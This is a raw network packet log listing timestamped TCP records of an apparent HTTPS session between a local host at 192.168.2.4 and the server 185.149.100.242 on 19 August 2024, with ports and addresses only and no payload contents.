Aug 19, 2024 09:28:45.146570921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.146599054 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.146619081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.148929119 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.154213905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.154237032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.154325962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.154344082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.154391050 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.154510021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.154530048 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.154568911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.154582977 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.154608965 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.155374050 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.155405998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.176213026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.176275969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.176337004 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.176374912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.176400900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.178924084 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.238009930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238039970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238111973 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238161087 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.238162994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238214016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238245010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.238245010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.238528013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238547087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238586903 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.238603115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238627911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.238687992 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238712072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238764048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.238781929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.238809109 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.239041090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.239057064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.239156961 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.239171982 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.246655941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.246687889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.246730089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.246766090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.246792078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.246942997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.246958971 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.247004986 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.247033119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.247061014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.251085997 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.269406080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.269484997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.269573927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.269658089 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.269697905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.325445890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.330832958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.330869913 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.330929995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.330979109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.330980062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.331006050 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331027985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331043005 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331052065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.331104040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.331118107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331325054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331346989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331372976 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.331382990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331410885 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.331615925 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331634045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331667900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.331676006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.331691980 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.339262962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.339291096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.339349985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.339375019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.339404106 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.339576960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.339591026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.339632988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.339643955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.339657068 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.343627930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.363945007 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.364006042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.364078999 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.364110947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.364125967 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.419337988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.423885107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.423955917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424091101 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424109936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424140930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424149036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424160957 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424206018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424227953 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424251080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424269915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424304008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424417019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424463034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424496889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424506903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424521923 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424547911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424649000 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424698114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424750090 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424760103 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424770117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424799919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424833059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424877882 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424897909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424906969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.424942017 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.424953938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.427758932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.432291031 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.432339907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.432396889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.432425976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.432451963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.432501078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.432588100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.432632923 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.432679892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.432699919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.432720900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.432755947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.434469938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.693170071 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.693202972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.693255901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.693288088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.693304062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.693320990 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.694256067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.694281101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.694319010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.694329023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.694350958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.694367886 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.694781065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.694798946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.694842100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.694848061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.694875956 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.695188046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.695205927 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.695247889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.695255995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.695286036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.695553064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.695569038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.695627928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.695636034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.695667028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.696115971 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.696131945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.696166039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.696172953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.696194887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.696213961 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.697201014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.697400093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.697416067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.697459936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.697469950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.697506905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.697721958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.697736979 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.697782040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.697796106 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.697849035 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.698283911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.698298931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.698342085 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.698349953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.698381901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.698621988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.698637009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.698667049 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.698679924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.698698997 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.698715925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.698956013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.698971033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.699017048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.699024916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.699058056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.699270964 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.699285984 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.699317932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.699325085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.699347019 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.699364901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.699606895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.699623108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.699661970 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.699670076 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.699704885 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.700010061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700026989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700059891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.700067043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700093985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.700107098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.700375080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700392008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700436115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.700443983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700475931 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.700779915 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700802088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700828075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.700835943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.700866938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.700875044 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.701175928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.701195955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.701265097 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.701272011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.701334953 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.701740980 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.707947016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.707963943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708053112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708067894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708102942 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708230019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708250046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708282948 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708291054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708347082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708347082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708503962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708520889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708574057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708581924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708616018 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708632946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708648920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708678961 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708686113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.708710909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.708730936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.709254026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.709269047 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.709322929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.709331989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.709346056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.709362984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.709780931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.709798098 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.709827900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.709836006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.709863901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.709882021 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.710424900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.710442066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.710474014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.710480928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.710524082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.710541964 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.736485958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.736504078 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.736602068 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.736622095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.736649036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.736664057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.770420074 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.793838024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.793862104 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.793926001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.793945074 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.793982983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.794064999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794079065 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794158936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.794167042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794213057 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.794363976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794378996 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794418097 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.794424057 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794454098 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.794678926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794694901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794744968 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.794751883 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.794800043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.795010090 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.795022964 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.795078993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.795084953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.795120955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.802453041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.802473068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.802546978 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.802567959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.802613020 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.802777052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.802793980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.802836895 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.802844048 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.802875042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.815427065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.829359055 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.829380989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.829452038 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.829469919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.829513073 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.857441902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.886477947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.886503935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.886576891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.886598110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.886637926 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.886698008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.886713028 CEST	443	49759	185.149.100.242	192.168.2.4
